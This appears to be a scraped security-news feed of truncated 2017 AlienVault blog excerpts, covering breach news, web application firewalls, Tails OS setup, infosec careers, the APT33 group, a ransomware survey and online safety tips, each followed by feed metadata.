direction.  We’re going to be speaking with stakeholders (leadership, data owners, users, etc.) to identify what sensitive information exists and where.  When speaking of responsibilities, we’re not speaking of who is responsible for securing what data but, rather who is responsible to establish, test, and maintain the program.  There needs to be leadership buy-in for the security program to be successful as the inevitable change that will occur is rarely comfortable.  The ship is doomed to failure is there is not an end goal in mind.  “Total security by December” is not an end goal.  Direction is more the ‘how’ than the ‘what’.  How is your plan going to be tested, implemented, designe]]> 2017-10-31T13:00:00+00:00 http://feeds.feedblitz.com/~/482776930/0/alienvault-blogs~Do-I-Need-a-Penetration-Test www.secnews.physaphae.fr/article.php?IdArticle=426027 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The Equifax Breach: Former White House CIO Believes Marketers Need To Be Engaged In Cybersecurity | Forbes Public speaking for academic economists The title of this is probably the furthest thing you might expect from information security, but it made my list this week because it is actually very relevant. Just like academics, information security professionals often have to convey complex concepts to non-security professionals. This deck lays out a lot of very useful points that are worth bearing in mind. Public speaking for academic economists | Dropbox link Equifax woes continue The UK financial regulator is stepping into the mess following the huge breach at Equifax. The regulator has said it is investigating the circumstances – and has the potential to fine or even revoke the company's right to operate in the UK. UK financial regulator confirms it is probing Equifax mega-breach | The Register Equifax under FCA investigation over data breach | The Telegraph FCA launches probe into Equifax | Financial Times Ghost of scammers In a story that proves that nothing is sacred to scammers, a Louisiana-based funeral home had its email account taken over and scam emails sent out to customers and suppliers asking for money. If a funeral home isn’t safe from hackers, who is? Hackers Take Over Funeral Home's Email Account and Run Online Scams | Bleeping Computer Google testing Android feature to hide DNS requests Google has added support in Android for an experimental feature that will encrypt DNS requests and prevent network-level attackers from snooping on user traffic. This new feature is named "DNS over TLS," an experimental protocol currently receiving comments at the Internet Engineering Task Force (IETF), an Internet standards body. Android getting “DNS over TLS” support to stop ISPs from knowing what websites you visit | XDA Developers Google testing Android feature to hide DNS requests | Bleeping Computer ]]> 2017-10-27T13:00:00+00:00 http://feeds.feedblitz.com/~/479913132/0/alienvault-blogs~Things-I-Hearted-This-Week-%e2%80%93-th-October www.secnews.physaphae.fr/article.php?IdArticle=425006 False Guideline Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC OWASP has been very active in defining techniques for writing web applications that can make them more resistant to such attacks - this great resource explores the topic in some depth. OWASP provides excellent resources to help developers who are interested in writing secure web applications. However, not all applications are written with these guidelines in mind, so it's very important that web servers have IPS, IDS, and standard firewalls in their network to prevent attacks as well. Unfortunately, those appliances will not able to prevent XSS attacks, SQL injection, or web session hijacking if your web applications are vulnerable to those kinds of attacks. In order to adequately protect web servers and applications, therefore, you should consider adding specialized web application firewalls to your network. Like other types of firewalls, web application firewalls can be hardware devices, software, or both. Web application firewall software is generally available as a web server plugin or an inline web server. Whether software or hardware, a web application firewall analyzes the GET and POST requests sent through HTTP and HTTPS, and applies configured firewall rules to identify and filter out malicious web traffic. In my recent "Explain How a Firewall Works" post, I identified the three main types of firewalls: stateless, stateful, and application firewalls. Web application firewalls are basically specialized application firewalls that analyze the content of packets, not just their headers. Web application firewalls catch malicious web traffic that other security appliances might miss before it reaches the actual web server. When properly implemented, they can also help your organization comply with PCI-DSS and HIPAA regulations.  In addition, a web application firewall's logging can be integrated into a SIEM solution so that security administrators can more effectively monitor your web servers' security. (There are HIPAA and PCI-DSS regulations that specifically pertain to web security.  HIPAA  PCI-DSS Implementing a properly configured web firewall can aid in compliance with those regulations.  As part of its operation, a web application firewall can respond to web traffic by blocking packets that have been identified as malicious, it can send a user a CAPTCHA challenge to prove that they're not a bot, and some firewalls can even simulate attacks to help you identify vulnerabilities. A web application firewall can be configured according to three basic security models. One model may be more effective than the others according to the specific context of the web server and application. A whitelisting model only allows web traffic accordin]]> 2017-10-25T13:00:00+00:00 http://feeds.feedblitz.com/~/478376870/0/alienvault-blogs~Explain-How-a-Web-Application-Firewall-Works www.secnews.physaphae.fr/article.php?IdArticle=423624 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC WHONIX is an ideal example; it can act as an Internet gateway for any operating system and it can send data through the TOR network. However, Whonix is not the only option. Tails OS is another option. It got immense visiblity after it was revealed that NSA whistle-blower Edward Snowden used Tails to hide his identity while sharing NSA secrets with journalists Glenn Greenwald and Laura Poitras. How is Tails OS Unique? Unlike Whonix, Tails OS is a live system that is designed to be used from a USB and DVD. Whonix is on the hard-drive and utilizes the hard-disk space, whereas  Tails runs via RAM. Thus, it leaves no trace,  even to someone with physical access to your computer/system. Tails is a free Debian-based OS. It has been designed to conserve your privacy and anonymity. It also comes with all the necessary applications, such as a web browser, messaging client, office suite, email client and more. Tails does not depend on the host operating system or hard-drive. Since you can use Tails via USB/DVD, it is a plug and play device. You can use Tails from your friend’s computer, public library or from anywhere. It also leaves no traces because it uses RAM storage, which is automatically erased when the computer shuts down. How to Configure Tails on a USB Drive This section discusses the steps to configure Tails OS on a USB drive. You can download the live preview of the OS and create a bootable USB. Another way is to temporarily host the Tails OS in a virtual machine and create the bootable USB from there. To do this, you need the following: Tails OS ISO (download from the official website) USB stick (with more than 8GB of space) Virtual box On your virtual box, click on new and give your image a name. Select Linux under type and Debian (64) for the version. On the next screen, allocate the memory. 1024 MB is sufficient to start with. Do not create a virtual hard-disk, Tails is a live OS and it is not supposed to install on the hard-drive. So, in the next step, select the first option: Create and  continue. Go to the settings on the newly created virtual machine and load the downloaded ISO in the storage section. Don’t forget to enable the Live CD/DVD option: Plug in the USB in the port and select the same device in the USB section of the VM settings: ]]> 2017-10-24T13:00:00+00:00 http://feeds.feedblitz.com/~/477624310/0/alienvault-blogs~Achieving-Online-Anonymity-Using-Tails-OS www.secnews.physaphae.fr/article.php?IdArticle=422850 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers.So, it is no mystery why leading innovation expert Alec Ross, in his book Industries of the Future, described cyber security as one of the five fields that will most shape our economic future. But if you’re currently outside looking into a career in cyber security, how do you break in? Where do you get started? To help answer that, here are 12 tips for a career in cyber security from my colleagues and InfoSec pros at AlienVault 1.Talk to Someone in InfoSec: Start by doing what I did when faced with writing this blog. I picked some in-house experts Javvad Malik, Kate Brew and Chris Doman who had some great advice as you’ll soon see. So reach out to someone you know who works in cyber security for their pearls of wisdom. Don’t know anyone yet? Don’t worry, we’ll help you fix that below. 2. Pick a Path: We often think of ‘cyber security’ as an overarching phrase, but there are many facets to it, so there are many routes to entry. A pen tester has a different route vs. a risk manager vs. an incident responder. Of course, it’s fine to start with a broad interest area within cyber security. For instance, make it a goal to get your Certified Information Systems Security Professional (CISSP) as a foundation. But eventually, you’ll want to choose a focus area that you like and enjoy. 3. Go to Conferences: There are a number of InfoSec cons to attend for networking. Yes, you probably will learn a thing or two by going, but focus more on meeting people and networking. The big security conferences like RSA and DefCon are great, but may be overwhelming as a newbie. So here’s a list of some other options: Derby Con GrrCon Cyber Security Summit & Hacker Conference Lascon Defcon Shmoocon Also, don’t miss the local BSides cons which are affordable, worldwide and great time spent. Before you go though, make sure you have a hit list of people you want to meet and for what purpose. Introduce yourself to them well in advance. See if you can carve out 10-15 mins with them for a coffee and have a plan of discussion. Don’t make it sound like an interview, rather a more casual conversation where you’re asking for guidance. Offer to drop them your CV so you’ll want to have one printed and ready. 4. Get a Daily Dose of Security Blogs: There are too many great security blogs to list, but I’d be remiss for not mentioning KrebsonSecurity, ]]> 2017-10-23T13:00:00+00:00 http://feeds.feedblitz.com/~/476886474/0/alienvault-blogs~Best-Advice-for-a-Career-in-Cyber-Security www.secnews.physaphae.fr/article.php?IdArticle=422506 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Child safety smartwatches ‘easy’ to hack, watchdog says | BBC Third of business directors have never heard of GDPR With GDPR around the corner, and the feeling that you cannot escape the acronym wherever you go; it is quite concerning to learn that a third of business directors haven’t heard of it. While one can understand if the general public is not aware of the upcoming regulation; it is incumbent upon company directors to be aware of increased responsibilities due to GDPR. GDPR is not just another technical or security requirement, but is based in fundamental privacy rights of citizens and with potentially harsh fines. Despite many months to prepare, it would appear as if GDPR may still catch many companies by surprise. Third of IoD Members Have Never Heard of GDPR | Infosecurity Magazine Ghosts of vulnerabilities past It looks like Microsoft’s bug tracking database was infiltrated back in 2013. The company kept the news quiet and moved on. It’s pretty worrying what someone with all that information could have / would have done. How many exploits were made possible because some bad guy somewhere found some vulnerabilities they could exploit? A good reminder that companies should take a hard look at their assets and their value. Not just value in terms of direct business, but the potential impact on customers. Microsoft responded quietly after detecting secret database hack in 2013 | Reuters Microsoft never disclosed 2013 hack of secret vulnerability database | ars technica Microsoft’s bug tracker was hacked in 2013 but it didn’t tell anyone about it | Silicon Angle Unmasking the ransomware kingpins This is a great read by Elie Bursztein on exposing the cybercriminal groups that dominate the ransomware underworld. It’s the third party in a trilogy of blogs – I probably can’t do it justice so it’s best you go check it out: Unmasking the ransomware kingpins A Stick Figure Guide to the Advanced Encryption Standard (AES) This is an old post – like really old from 2009. But I only came across it recently and found it to be real]]> 2017-10-20T13:00:00+00:00 http://feeds.feedblitz.com/~/474958195/0/alienvault-blogs~Things-I-Hearted-this-Week-th-October www.secnews.physaphae.fr/article.php?IdArticle=421708 False None APT33,APT 33 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC SANS 2017 Incident Response Survey, nearly half of the survey base reported that, on average, it takes more than 24 hours to contain a threat, and 82% reported a remediation time of one month or longer. There are many factors that can slow down an incident response process. Commonly, IT and security reside in different parts of the organization and may use different systems to track and prioritize work. Having to work across multiple ticketing workflow systems that are complex to integrate, redundant, or siloed by product can slow down or introduce errors into an incident response process. To help reduce time, complexity, and errors in kicking off incident response activities, we’ve brought AlienVault USM Anywhere closer together with Jira, a leading issue and project tracking software. Today, we’re announcing our newest AlienApp for Jira, instantly available to all USM Anywhere customers. The AlienApp for Jira helps close the gap between threat detection and incident response activities. With the AlienApp for Jira, you can open and track Jira issues directly from USM Anywhere, making it easy, fast, and efficient to monitor the lifecycle of your incident response activities, even across multiple security and IT teams. From any alarm, event, or vulnerability detected in USM Anywhere, you can create a new Jira issue that captures the relevant threat data needed for effective response, saving you time and effort. You can also automate the creation of new Jira issues in response to threats detected in USM Anywhere to further reduce the time between detection and resolution. By combining USM Anywhere with Jira, one of the most widely-used tools for both IT service organizations and software development teams, you can streamline your incident response activities and effectively reduce the time to resolution for security incidents. The Problem Returning to the Equifax example, let’s look at a simplified scenario of how a vulnerability moves from identification to remediation in many organizations. A regular network scan (usually off hours) identifies a critical vulnerability. The next day (and sometimes later), a security analyst reviews the scan results and identifies which machines need patching. The security analyst logs into a separate IT ticketing system and manually enters all of the relevant information about the vulnerability. The ticket is added to a long queue of requests for the IT team. The security analyst continually checks the ticketing system (and/or badgers his or her IT colleagues) to see the status of the request. Now, let’s look at the same scenario with USM Anywhere and Jira working in concert thanks to the AlienApp for Jira. A regular network scan (usually off hours) identifies a critical vulnerability. A USM Anywhere orchestration rule immediately responds to the new vulnerability by automatically creating an issue in Jira, including the relevant information about the vulnerability and the affected asset. The Jira issue is immediately triaged by the IT team and assigned. The security analyst arrives at work in the morning, checks USM Anywhere, and sees that the vulnerability has been identifie]]> 2017-10-18T13:00:00+00:00 http://feeds.feedblitz.com/~/473471728/0/alienvault-blogs~Streamline-Incident-Response-with-USM-Anywhere-and-Jira www.secnews.physaphae.fr/article.php?IdArticle=420698 False Guideline Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC hack of Sony in 2014, China’s alleged hack of the US’s Office of Personnel Management in 2015, or Russia’s alleged hack of the Democratic National Committee in 2016, the stories are mounting. Iran has also been in the cyber espionage news, with major suspected attacks ranging from the Las Vegas Sands attack in 2014 to the DDOS attack on numerous US banks in 2016. Beyond these high-profile attacks, there are also countless examples of low-profile attacks. While these attacks don’t make the major headlines, they may actually be more relevant to your organization. In this blog, we zero in on this lesser-publicized activity, focusing on a recently discovered Iranian hacker group, dubbed APT33, the tools they have developed, and how AlienVault can help you detect this activity in your environment. What is state-sponsored cyber espionage and what are the typical goals? First, a quick primer on state-sponsored cyber espionage. State-sponsored cyber espionage is the act of obtaining secrets and information from individuals, competitors, rivals, groups, governments, and enemies, without the permission and knowledge of the holder of the information, usually for economic, political, or military advantage. The goals of these state-sponsored groups or individuals range from basic theft or sabotage to collecting military and diplomatic information to enabling domestic organizations to compete on a global economic level. Why should you care? Should you be concerned about state-sponsored cyber hacks? In a word, yes. And, it’s really the low-profile attacks from state-sponsored hackers that should be most concerning. This is because the tools and methods that these hackers develop and utilize can be leveraged by other nefarious hackers against your organization. You need to be alerted to and protected against these tools. Who is APT33? This leads us to Iranian group Advanced Persistent Threat 33 (APT33), a group recently chronicled by security firm FireEye. FireEye assessed that APT33 works at the behest of the Iranian government, and they attribute to APT33 many breaches of Saudi Arabian, South Korean, and US organizations ranging from the aviation sector to the energy sector. The primary goals of APT33 appear to be to enhance Iran’s domestic aviation capabilities or to support Iran’s military decision making against Saudi Arabia. Notably, FireEye has found signs of APT33 activity in some of its own clients' networks, but suspects the APT33 intrusions have been on a wider scale. APT33 has unveiled new tools, including a new backdoor. APT33 has developed numerous tools, including a new backdoor called TURNEDUP. TURNEDUP is capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information. FireEye found that APT33 has also leveraged Dropshot, a drop]]> 2017-10-17T13:00:00+00:00 http://feeds.feedblitz.com/~/472705174/0/alienvault-blogs~Newly-Discovered-Iranian-APT-Group-Brings-Statesponsored-Cyber-Espionage-into-Focus www.secnews.physaphae.fr/article.php?IdArticle=419823 False Guideline APT33,APT 33 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Garrett Gross, Director, Field Enablement at AlienVault, spoke on Tuesday about Open Source Tools. It was a standing room only crowd! Later on Tuesday, Garrett participated in a panel in the Main Ballroom! Kevin Mitnick presented on Wednesday, and did a book signing in the booth right next to us. We had several luminaries come by the booth, including a Security Guy and Slava, a prominent SpiceHead. clear--> People loved the astronaut theme. Jordan Sander even wore astronaut socks when working the booth! Like previous years, Holly Barker had some intimate moments with Spice Rex, shown below proposing marriage. All-in-all, an awesome event!       ]]> 2017-10-16T13:00:00+00:00 http://feeds.feedblitz.com/~/471953148/0/alienvault-blogs~SpiceWorld www.secnews.physaphae.fr/article.php?IdArticle=419331 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Disqus said a 2012 breach discovered on October 5th exposed information on 17.5 million users from as far back as 2007. That’s a pretty significant breach, however, the silver lining was how well Disqus handled the breach and the speed and clarity with which it shared details. Troy Hunt goes over this on his blog. Disqus reveals it suffered a security breach in 2012 | Engadget Disqus Breach Exposed 17.5m Emails | Infosecurity Disqus Data Breach: 17.5 Million Exposed, Shows Rapid Response | IT Security Central Bitcoin Miners and AWS As more companies embrace aspects of cloud computing, we are seeing cyber criminals, and indeed researchers, increasingly turn their focus towards cloud security. In recent months there have been many instances of misconfigured Amazon databases exposing sensitive information publicly. However, there is more than just precious data in the cloud. This attack shows that the power of cloud computing is sought-after for bitcoin mining or other nefarious purposes. Forget stealing data — these hackers hijacked Amazon cloud accounts to mine bitcoin | Business insider AWS Cloud Hacked by Bitcoin Miners | Enterprise Tech Malvertising campaign targets Pornhub Hackers used malvertising on adult video website Pornhub and abused the Traffic Junky advertising network to redirect users to a malicious website. Chrome and Firefox users were shown a fake browser update window, while IE and Edge users got a fake Flash update one. Malvertising campaigns are a favoured avenue for many attackers. In 2016, Google removed 112 million bad ads which on top of malware include illegal product promotion and misleading ads. ]]> 2017-10-13T13:00:00+00:00 http://feeds.feedblitz.com/~/469701892/0/alienvault-blogs~Things-I-Hearted-this-Week-th-October www.secnews.physaphae.fr/article.php?IdArticle=418401 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Security Analysis using AlienVault® USM Anywhere™ course. We’ve abducted (not really!) subject matter experts as well as real-life AlienVault customers to ensure we develop the right course for your needs. Many of the above quotes are from customers who have taken a previous AlienVault USM Anywhere course, which teaches you about the operational side of running USM Anywhere in your environment. This new course will, as requested by the customers above, concentrate on understanding where alarms come from and how to effectively investigate and respond to them. The Security Analysis using AlienVault® USM Anywhere™ two-day course provides you with the knowledge and tools to fully leverage AlienVault USM Anywhere to perform security analysis. Students will gain new skills in identifying and remediating threats using AlienVault USM Anywhere. Course participants will gain these skills through hands-on examples and exercises in performing and analyzing attacks on a live environment, with multiple asset types running a range of different software. Topics covered include: Preparation: Know Your Environment USM Anywhere Tuning Threat Intelligence: Detect and Research Threats and Attack Methods Detection: Evaluate Alarms and Events Containment and Response: Minimise impact and automation Root Cause Analysis: Trace the timeline of an incident Recovery: Recover from an incident Reporting: Compliance and Reporting You will benefit from instructor lectures, live instructor demonstrations, and numerous hands-on practice labs, which make up over 50% of the course. This hands-on course ensures that you are fully equipped to use AlienVault’s USM Anywhere functions and features, as well as a few useful external tools and sites, to detect and respond to security incidents. ]]> 2017-10-11T13:00:00+00:00 http://feeds.feedblitz.com/~/468118830/0/alienvault-blogs~Our-Newest-Training-Course-Security-Analysis-using-AlienVault-USM-Anywhere www.secnews.physaphae.fr/article.php?IdArticle=417647 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC #infosec community, must contributors be able to write code? — Kate Brew (@securitybrew) September 28, 2017 I tried to make it OK to vote "yes", since the InfoSec community is typically open and inclusive of all kinds of people, and I didn't intend for a "yes" vote to be construed as negative. Not sure I accomplished that goal, but in any case the comments offered were maybe even more telling of the community's views than the numeric result of the poll. The question turned out to be much more controversial than I expected. Several people were adamant that coding, especially writing scripts to automate tasks, is an essential part of the InfoSec job. Then there were others who had more of the attitude of “it takes a village”, and suggested that many different skills are of value to InfoSec professionals. Coding skills are clearly both valuable and valued This poll changed my views on the necessary skills I would recommmend for those aspiring to work in InfoSec. The ablity to write code to automate processes would be advantageous for anyone trying to get into the field. At the same time, so would a background in network engineering, system administration or help desk. There are many paths that lead to InfoSec careers. Not everyone that works in InfoSec comes from a coding background, but the comments suggest that those who do find it helpful. And while not everyone in InfoSec is proficient in coding/scripting, this ability sure seems to help those who are. It's not yes/no. There will be valuable jobs in infosec without coding. But there's non-decreasing number of roles that need code skills. — Paco Hope (@pacohope) September 28, 2017 Interesting Q. Im scanning through all the names of those who I think made the largest infosec contributions, and how many know how to code. — Jeremiah Grossman (@jeremiahg) September 28, 2017   — Jeremiah Grossman (@jeremiahg) September 28, 2017   The way things are going, the next generation will graduate from school knowing how to code. — Jen Savage (@savagejen) September 28, 2017 Coding skil]]> 2017-10-10T13:00:00+00:00 http://feeds.feedblitz.com/~/467573112/0/alienvault-blogs~Do-InfoSec-Folks-Need-to-be-Able-to-Write-Code www.secnews.physaphae.fr/article.php?IdArticle=417173 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC In celebration of Week 2 of National Cyber Security Awareness Month (NCSAM) – surprise! Another blog! In the wild we see culture. The fierce predator, the T-Rex of an organisation. It moves swiftly and silently devouring all in its path. Strategy is its favourite dish, chomping down large chunks of strategy and washing it down with the tears of shareholders. Security is also a delicacy that culture enjoys as a Sunday roast. In the aftermath of a security incident or breach, many experts focus on the people, process, and technology side of the equation. Did the people have the right skills, were the right processes in place, and did they invest in the right technology that would have stopped the attack. While these are good and important questions to ask, culture underscores each aspect. A brittle culture can doom even the greatest of security strategies. The reality is that culture is more efficient than strategy. People don’t go above and beyond the call of duty because something is written in a policy. They do it because they believe the company, their colleagues, and peers would do the same for them. In this regard, culture provides greater discipline than disciplinary action does. If a company has a culture of aspiring to be environmentally-friendly, it doesn’t need a policy to tell people to separate their rubbish into the relevant bins; co-workers will take care of that. Similarly, when a company has a strong security culture, co-workers will help take care of any issues that need addressing, such as leaving workstations unlocked, sharing passwords, or forgetting sensitive documents on the printer. Building a security culture from the ground up is akin to the Broken Windows Theory popularised by James Q. Wilson and George L. Kelling, where they advocated reducing large crimes by stopping smaller crimes. The authors claim that a broken window left for several days in a neighbourhood would trigger more vandalism. The small defect signals a lack of care and attention on the property, which in turn implies that crime will go unpunished. This theory was used to fight vandalism on the New York Subway - arguing that cleaning up graffiti on trains would prevent further vandalism. Perhaps one of the biggest strengths of having a strong security culture is that there isn’t the desire to find scapegoats. When a security breach occurs, firing the CISO, or blaming individuals won’t undo the breach. Taking a measured approach to understand what went wrong, and finding ways to fix it will build business resilience. It reinforces the fact that security will never be one hundred percent perfect, and there will be tough times that the organisation will overcome together. This creates the difference between staff coming to the defence of their company during a crisis, as opposed to joining in the attack. The security culture extends beyond the corporate environment though, and can be seen in the peoples personal lives. This is very much needed. When we look at the amount of information that people have online, it is important to foster an extended culture of security within the home. Making family members aware of online dangers and how to navigate them is sometimes more important than corporate data. But to be effective in the long run, good security needs to be observable. Otherwise it is just as easy to slip into bad practises. A study conducted by Gino, Ayal and Ariely demonstrated the connection between cheating and the impact of it on oth]]> 2017-10-09T13:00:00+00:00 http://feeds.feedblitz.com/~/467054168/0/alienvault-blogs~Culture-Eats-Security-for-Lunch www.secnews.physaphae.fr/article.php?IdArticle=416748 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Cybersecurity Insiders, partnering with the 380,000+ member Information Security Community on LinkedIn, commissioned Crowd Research Partners to conduct an indepth study to gather insights, reveal the latest ransomware trends, and provide guidance on effectively addressing the ransomware threat. A brief extract follows, but you can read the whole report here! Key Findings Ransomware is the fastest growing security threat, perceived as a moderate or extreme threat by 80% of cybersecurity professionals. 75% of organizations affected by ransomware experienced up to five attacks in the last 12 months alone, 25% experienced 6 or more attacks. 79% predict ransomware to become a larger threat over the next 12 months. Only a small fraction of respondents say they would pay the ransom or negotiate with the attackers. 59% of organizations are either not confident at all or only slightly to moderately confident in their ransomware defense. Email and web use represent the most common ransomware infection vectors with employees opening malicious email attachments (73%), responding to a phishing email (54%) or visiting a compromised website (28%). The information most at risk from ransomware attacks is financial data (62%) followed by customer information (61%). From a solution perspective, the majority of identified ransomware attacks were detected through endpoint security tools (83%), email and web gateways (64%), and intrusion detection systems (46%). Security professionals rank user awareness training the most effective tactic to prevent and block ransomware (77%) followed by endpoint security solutions (73%), and patching of operating systems (72%) as preventive approaches to ransomware threats. Data backup and recovery (74%) is by far as the most effective solution to respond to a successful ransomware attack. 96% of respondents confirm they have a data backup and recovery strategy in place. A majority of 54% say they could recover from a successful ransomware attack within a day, while 39% estimate it will take more than one day to a few weeks to recover. Speed of recovery is absolutely mission-critical as business cost escalates with every hour the business cannot fully operate, causing system downtime (41%) and productivity loss (39%). Today’s main obstacles to stronger ransomware defense are all about resources and staying current on the latest ransomware exploits: lack of budget (52%), dealing with evolving sophistication of attacks (42%), and lack of human resources (33%). The silver lining: 60% of organizations expect their budget for ransomware security to increase. Check out the whole report.    ]]> 2017-10-05T13:00:00+00:00 http://feeds.feedblitz.com/~/465218044/0/alienvault-blogs~Ransomware-Report www.secnews.physaphae.fr/article.php?IdArticle=415746 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC It’s no secret that I’m passionate about Cyber Security. So naturally, I do what any other person obsessed would do: listen to podcasts whenever I get the chance. This past Monday, I was walking from my campus to the train station while listening to an interview on Recorded Future with Myke Cole. Little background on Myke Cole: he’s a famous author and has experience working in Government Intelligence. The part of the interview that stuck out to me was when Cole discussed the understanding, goals and motivations of cyber-terrorists. This was the catalyst for my blog. I did my undergrad study in psychology before I started my Master’s degree in Cyber Security. The psych background has given me some strong analytical and interpersonal skills, and those abilities have come in handy in my cyber security studies. I call this my non-technical approach to a technical field. Now, if I claimed to know how cyber-criminals think, that would be an overestimation of my ability, but I’d say that my psychology background helps me have a better understanding of their motivations. To be honest, I kind of love to show off my psych skills every now and then, especially at my favorite place, the Hookah Lounge. So, when I talk to someone new, I might bring up how passwords can be easily cracked just by analyzing a person’s interests, or by using information and pictures from a person’s social media. An illustration of this is my friend “Stacey” and her Facebook profile. She has a picture of herself with Chicago Cubs fans. We can assume that her love for the Cubs or something to do with team (IE players, numbers, and important dates in Cubs history) could be a potential password selection. Stacey also likes to watch superhero movies, so maybe her password might correspond to her favorite hero or villain. The process becomes a lot easier with password policies that require special characters to be used due to the fact that passwords become more predictable with these rules. By combining these with her interests, then voila, we can have an idea of what password she uses. She told me I was close and that her password had to deal with a hobby of hers that she did with her Dad when she was younger. Now this doesn’t make me or anyone the Criss Angel of password cracking but it does provide a good idea of how to improve company password policies. I want to expand this to also encompass cyber-crime, cyber-terrorism, and threat analysis etc. We begin to understand that stopping this from a cyber security perspective becomes a lot easier when we become empathic and aware of the factors that can help us understand a group’s motives and what really drives its members to commit malicious acts. Various factors that can be looked at are social media behavior patterns, socio-economic status, and past criminal background can provide us with clues. However, even with enough data, we are still unsure of when and where cyber-attacks will originate. As Batman says, “It’s never easy dealing with the Joker.” Understanding where, what, and why our Joker attacks their target will greatly change how we protect our assets and infrastructure within the cyber-security landscape. This helps us Cyber Security professionals to stay a few steps ahead of the adversary and sometime even be able to checkmate them before any damage occurs. Conclusion]]> 2017-10-04T13:00:00+00:00 http://feeds.feedblitz.com/~/464627122/0/alienvault-blogs~A-Psychological-Approach-to-Cyber-Security www.secnews.physaphae.fr/article.php?IdArticle=415278 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC National Cyber Security Awareness Month (NCSAM) with a weekly series of security articles on how to improve the state of cyber security-ness. Staying safe online has many similarities with staying safe on the line, aka tightrope walking. It involves a delicate mix of courage, foolhardiness, balance, poise, and the threat of falling to a horrible death. There are many lists that detail the extensive do’s and don’ts on staying safe online, so I won’t repeat them. Rather, I’ve distilled what I believe to be the most important information as captured through events and conversations in my daily life. If it’s too good to be true Most of the time, my children make a mess in their room and despite repeated requests, I end up having to do most of the cleaning myself. One weekend, I made a deal with them, that if they cleaned their rooms properly, I’d give them each five pounds, take them to a movie, pizza, let them have sweets and stay up late. After an hour, their rooms looked cleaner than they had ever been. I didn’t deliver the goods. I laughed at them and told them that if something sounds too good to be true it usually is. This is good parenting, as it demonstrated to them that they are perfectly capable of cleaning their room, and that they should be careful as to what they believe in real life, or online and are less likely to click on a link in an email or pop-up. Keeping software up to date My daughter wanted a cat. Despite being allergic to cats, I agreed on the condition that I would buy the cat, but would not spend any money on buying it any cat food. “You’re so cruel! The cat would get weak and die.” Said my daughter. Operating systems, browsers, security software, and apps, like cats, need to be kept up to date and ‘fed’ the latest updates and patches. Neglecting to do so can cause them to grow frail and eventually die, possibly taking your business with them. I hope my daughter remembers this lesson when she grows up, once she gets over not having a cat. Backup While watching Superman with my older son, he said that he wished Superman was his dad - that way he would be strong, and could fly, and have lasers shoot from his eyes. I flexed my arm, pointed to my bicep and told him that “dad is strong”, to which he merely replied, “but you’re not Superman.” In my mind, I immediately scrapped plans to pay for his education or buy him a nice car. It kind of works out for the best because it means I will be able to spend all that extra money on my younger son. This is why backups are important, because you never know when the first one will fail you. Passwords One day I decided it would be easier if I called my wife and four children all “Bob”. It was the ultimate in convenience. If I needed something I only needed to ask for Bob. Birthday cards could be recycled. I could even get bulk discounts on items such as personalised keyrings. The day started off well, I asked Bob if she wanted a cup of tea and yelled at Bob for being late for school. Bob was very confused about this and asked what was going on. But I didn’t have time to explain because Bob needed his feed. In the end, all the Bob’s had enough and stopped talking to me saying using the same name for everyone was a stupid idea. A bit like reusing the same password I guess. Sharing While on holiday, a friend posted a few family photos on Facebook that not only included my children, but caught me before I had a chance to suck my gut in and smile properly. As a result, I came]]> 2017-10-02T13:00:00+00:00 http://feeds.feedblitz.com/~/463377560/0/alienvault-blogs~How-to-Stay-Safe-Online-%e2%80%93-Tips-for-Regular-Folks www.secnews.physaphae.fr/article.php?IdArticle=414331 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC breaches will just keep rolling to the point of fatigue. But at least they will be ginger latte flavoured breaches. When a breach costs the top job In an M Night Shyamalan plot twist, Richard Smith, CEO of Equifax has resigned in the wake of the huge data breach which saw an estimated 143 million records exposed. Is there any doubt that information security should be taken seriously at the highest of levels? Or do the heads of CEOs need to roll on a more frequent basis for businesses to understand security isn’t an isolated IT issue to manage? Equifax CEO suddenly 'retires' following an epic data breach affecting up to 143 million people | CNBC Equifax CEO Richard Smith resigns after uproar over massive hack | Bloomberg Trying to Stem Fallout From Breach, Equifax Replaces C.E.O. | NY Times How much does that train journey cost? Transport for London which runs the London underground, aka the Tube, introduced WiFi on trains a couple of years ago. Many commuters were glad to be able to connect in the otherwise dead zones, giving an excuse to stare at their phones to avoid even accidental eye contact with another Londoner making their way to or from work. However, getting even a little bit of data attracts business attention like blood in the water attracts sharks. There are plans to track customers through their WiFi connection and then sell on the data – potentially netting Transport for London (Tfl) £322m. Of course, this isn’t the only company to do so. Many free WiFi providers, such as those in shopping centres (malls) will track customer movement. The only way to defend against such tracking is to turn off WiFi on the device. It reinforces how much customer data is worth, but how little people actually care, or consider the cost. Maybe GDPR will help in this regard as Tfl will have to demonstrate consent per person for this, and also allow for opt-outs. Tfl plans to make £322m by collecting data from passengers’ mobiles | Sky news Transport for London bosses planning to track commuters using WiFi | Evening Standard Here’s what Tfl learned from tracking your phone on the tube | Gizmondo Qualifications and tech jobs This isn’t really news – but a deb]]> 2017-09-29T13:00:00+00:00 http://feeds.feedblitz.com/~/462428416/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Sept www.secnews.physaphae.fr/article.php?IdArticle=413871 False None Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC I’m sure you’ve seen firewall diagrams like this, but what’s really going on? Firewalls filter network traffic so that you only receive data that you should be getting. No firewall works perfectly, and a lot of a firewall's effectiveness depends on how you configure it. To get a basic grasp of how firewalls work, it's important to understand how TCP packets work. The data that your computer sends and receives over the internet or an internal network is comprised of TCP packets and UDP packets. TCP packets can be more 